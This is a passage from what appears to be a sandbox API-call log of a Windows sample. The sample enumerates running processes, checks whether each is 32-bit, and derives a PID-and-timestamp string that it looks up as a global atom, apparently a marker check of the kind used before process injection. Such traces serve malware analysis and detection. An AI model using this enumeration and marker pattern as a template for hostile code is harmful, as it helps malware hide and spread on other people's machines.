	[0133.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.584] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.584] CloseHandle (hObject=0x2dc) returned 1
	[0133.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.585] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.585] CloseHandle (hObject=0x2dc) returned 1
	[0133.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0133.585] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.585] CloseHandle (hObject=0x2dc) returned 1
	[0133.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0133.586] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.586] CloseHandle (hObject=0x2dc) returned 1
	[0133.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.586] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetLastError () returned 0x5
	[0133.587] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.588] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0133.588] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.588] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.589] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetLastError () returned 0x5
	[0133.590] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.590] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0133.590] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.591] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0133.591] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0133.591] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0133.591] CloseHandle (hObject=0x2dc) returned 1
	[0133.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0133.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.591] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.592] CloseHandle (hObject=0x2dc) returned 1
	[0133.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.592] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.592] CloseHandle (hObject=0x2dc) returned 1
	[0133.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.592] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.592] CloseHandle (hObject=0x2dc) returned 1
	[0133.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.593] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.593] CloseHandle (hObject=0x2dc) returned 1
	[0133.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0133.593] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.593] CloseHandle (hObject=0x2dc) returned 1
	[0133.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0133.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.631] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.631] CloseHandle (hObject=0x2dc) returned 1
	[0133.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.632] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.632] CloseHandle (hObject=0x2dc) returned 1
	[0133.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0133.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.632] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.632] CloseHandle (hObject=0x2dc) returned 1
	[0133.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.633] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.633] CloseHandle (hObject=0x2dc) returned 1
	[0133.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.633] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.633] CloseHandle (hObject=0x2dc) returned 1
	[0133.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.634] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.634] CloseHandle (hObject=0x2dc) returned 1
	[0133.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.634] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.634] CloseHandle (hObject=0x2dc) returned 1
	[0133.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.635] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.635] CloseHandle (hObject=0x2dc) returned 1
	[0133.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.635] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.635] CloseHandle (hObject=0x2dc) returned 1
	[0133.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.636] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.636] CloseHandle (hObject=0x2dc) returned 1
	[0133.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.636] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.636] CloseHandle (hObject=0x2dc) returned 1
	[0133.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.637] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.637] CloseHandle (hObject=0x2dc) returned 1
	[0133.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.637] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.637] CloseHandle (hObject=0x2dc) returned 1
	[0133.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0133.640] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.640] CloseHandle (hObject=0x2dc) returned 1
	[0133.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0133.640] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.641] CloseHandle (hObject=0x2dc) returned 1
	[0133.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.641] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.641] CloseHandle (hObject=0x2dc) returned 1
	[0133.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.641] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.641] CloseHandle (hObject=0x2dc) returned 1
	[0133.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.642] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.642] CloseHandle (hObject=0x2dc) returned 1
	[0133.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.642] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.642] CloseHandle (hObject=0x2dc) returned 1
